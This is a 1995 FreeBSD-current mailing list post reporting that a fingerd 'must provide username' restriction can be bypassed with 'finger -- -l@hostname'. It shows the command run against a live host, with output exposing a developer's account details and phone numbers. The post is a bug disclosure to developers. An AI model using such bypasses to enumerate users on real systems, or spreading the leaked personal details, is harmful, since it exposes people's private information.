From owner-freebsd-current Sun Oct 22 12:08:39 1995 Return-Path: owner-current Received: (from root@localhost) by freefall.freebsd.org (8.6.12/8.6.6) id MAA03515 for current-outgoing; Sun, 22 Oct 1995 12:08:39 -0700 Received: from jhome.DIALix.COM (root@jhome.DIALix.COM [192.203.228.69]) by freefall.freebsd.org (8.6.12/8.6.6) with ESMTP id MAA03510 for ; Sun, 22 Oct 1995 12:08:33 -0700 Received: (from peter@localhost) by jhome.DIALix.COM (8.6.12/8.6.9) id DAA06357; Mon, 23 Oct 1995 03:08:28 +0800 Date: Mon, 23 Oct 1995 03:08:28 +0800 (WST) From: Peter Wemm To: current@freebsd.org Subject: More on the fingerd bug.... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-current@freebsd.org Precedence: bulk The finger hole is even easier to get around.. It was mentioned that you could get around it by telneting to the finger port and typing -l Well.. You can do it with "finger -- -l@hostname" and the same with "-s" -Peter [[ Sorry to pick on you, Jordan... :-) ]] peter@jhome[3:02am]/tmp-100> finger @time.cdrom.com [time.cdrom.com] must provide username peter@jhome[3:02am]/tmp-101> finger -- -l@time.cdrom.com [time.cdrom.com] Login: jkh Name: Jordan K. Hubbard Directory: /home/jkh Shell: /usr/local/bin/bash Office: At Home, +1 510 928 8380 Home Phone: +1 510 682 7859 On since Fri Oct 20 14:49 (PDT) on ttyv0, idle 1 day 21:13 On since Fri Oct 20 14:49 (PDT) on ttyp0, idle 1 day 8:55, from :0.0 On since Sat Oct 21 11:48 (PDT) on ttyp1, idle 1:23, from :0.0 On since Sat Oct 21 11:48 (PDT) on ttyp2, idle 0:20, from :0.0 On since Fri Oct 20 14:56 (PDT) on ttyp4, idle 0:25, from :0.0 On since Sat Oct 21 12:40 (PDT) on ttyp5, idle 0:26, from :0.0 On since Fri Oct 20 23:54 (PDT) on ttyp6, idle 1:43, from :0.0 On since Sun Oct 22 07:46 (PDT) on ttyp8, idle 1:08, from :0.0 On since Sat Oct 21 00:27 (PDT) on ttypa, idle 7:30, from :0.0 On since Sat Oct 21 16:07 (PDT) on ttypb, idle 4:55, from :0.0 On since Sun Oct 22 00:58 (PDT) on ttypc, idle 4:28, from :0.0 New mail received Sun Oct 22 11:54 1995 (PDT) Unread since Sun Oct 22 11:23 1995 (PDT) No Plan. peter@jhome[3:02am]/tmp-102> finger -- -s@time.cdrom.com [time.cdrom.com] Login Name TTY Idle Login Time Office Office Phone jkh Jordan K. Hubbard v0 1d Fri 14:49 At Home +1 510 928 8380 jkh Jordan K. Hubbard p0 1d Fri 14:49 At Home +1 510 928 8380 jkh Jordan K. Hubbard p1 1:27 Sat 11:48 At Home +1 510 928 8380 jkh Jordan K. Hubbard p2 24 Sat 11:48 At Home +1 510 928 8380 jkh Jordan K. Hubbard p4 29 Fri 14:56 At Home +1 510 928 8380 jkh Jordan K. Hubbard p5 29 Sat 12:40 At Home +1 510 928 8380 jkh Jordan K. Hubbard p6 1:47 Fri 23:54 At Home +1 510 928 8380 jkh Jordan K. Hubbard p8 1:12 Sun 07:46 At Home +1 510 928 8380 jkh Jordan K. Hubbard pa 7:34 Sat 00:27 At Home +1 510 928 8380 jkh Jordan K. Hubbard pb 4:59 Sat 16:07 At Home +1 510 928 8380 jkh Jordan K. Hubbard pc 4:32 Sun 00:58 At Home +1 510 928 8380